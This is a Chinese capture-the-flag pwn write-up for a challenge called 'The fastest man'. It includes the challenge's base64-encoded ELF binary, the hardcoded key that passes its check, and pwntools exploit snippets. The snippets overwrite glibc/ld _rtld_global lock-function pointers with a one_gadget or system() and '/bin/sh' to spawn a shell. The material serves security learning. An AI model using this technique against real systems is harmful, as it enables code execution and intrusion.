The fastest man
首先这个题没有附件,nc后是一段base64的编码
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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AhAAAAAAADACEAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAawAAAAAAAAAMAAAAAAAAAIAHQAAAAAAADQAAAAAAAAC0C0AAAAAAABkAAAAAAAAAoB1gAAAAAAAbAAAAAAAAAAgAAAAAAAAAGgAAAAAAAACoHWAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAJgCQAAAAAAABQAAAAAAAACoBEAAAAAAAAYAAAAAAAAA+AJAAAAAAAAKAAAAAAAAAAEBAAAAAAAACwAAAAAAAAAYAAAAAAAAABUAAAAAAAAAAAAAAAAAAAADAAAAAAAAAIgfYAAAAAAABwAAAAAAAAAwBkAAAAAAAAgAAAAAAAAAUAEAAAAAAAAJAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAPv//28AAAAAAQAAAAAAAAD+//9vAAAAANAFQAAAAAAA////bwAAAAACAAAAAAAAAPD//28AAAAAqgVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4HWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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
求助misc佬在线字节码转elf
程序除了pie全开
首先要绕过密码,本地VklhvaYq直接过了,但打远程时发现key不对
对比了一下发现base64码有一段是不一样的,推测此处为key的码
下面有一次任意写,改exit为ogg就可以通了(虽然没有exit_hook这个东西,但可以说是攻击exit_hook了)
从exit hook - 狒猩橙 - 博客园 (cnblogs.com)师傅这学到的改rtld_lock_default_lock_recursive 或 rtld_lock_default_unlock_recursive 为 one_gadget
exit 会调用属于_rtld_global结构体的rtld_lock_default_lock_recursive 和rtld_lock_default_unlock_recursive
我们获取rtld_lock_default_lock_recursive地址后直接将ogg写入
ogg不对会触发canary( ?),多试几个one_gadget就行了
可惜当时远程没出,没时间试libc版本了(不给libc版本好ex)
全场唯一解是amazh师傅出的太强了
exp:
ru('key: ')
sl(b'VklhvaYq')
ru('Give you another chance:(')
sys_addr = int(r(14),16)
li(hex(sys_addr))
libc_base = sys_addr-0x52290
li('libc_base = '+hex(libc_base))
ogs = [0xe3afe,0xe3b01,0xe3b04]
ogg = libc_base + 0xe3afe
exit = libc_base + 0x243F68
li('exit '+hex(exit))
ru('give me a address:')
ld_base = libc_base+0x213000
_rtld_global = ld_base + ld.sym['_rtld_global']
_dl_rtld_lock_recursive = _rtld_global + 0xf08
_dl_rtld_unlock_recursive = _rtld_global + 0xf10
sl(str(_dl_rtld_lock_recursive))
#dbg()
sla('give me a value:',str(ogg))
itr()
另一种需要二次任意写,改rtld_lock_default_lock_recursive 或 rtld_lock_default_unlock_recursive为system,_dl_load_lock为/bin/sh\x00
ld_base = libc_base + 0xffffffff
_rtld_global = ld_base + ld.sym['_rtld_global']
_dl_rtld_lock_recursive = _rtld_global + 0xf08
_dl_rtld_unlock_recursive = _rtld_global + 0xf10
_dl_load_lock = _rtld_global + 0x908
#二次任意写
s.send(p64(_dl_rtld_lock_recursive))
s.send(p64(libc_base + libc.sym['system']))
s.send(p64(_dl_load_lock))
s.send(b'/bin/sh\x00')
标签:recursive,攻击,lock,global,libc,hook,base,exit,rtld From: https://www.cnblogs.com/shuzM/p/17082174.html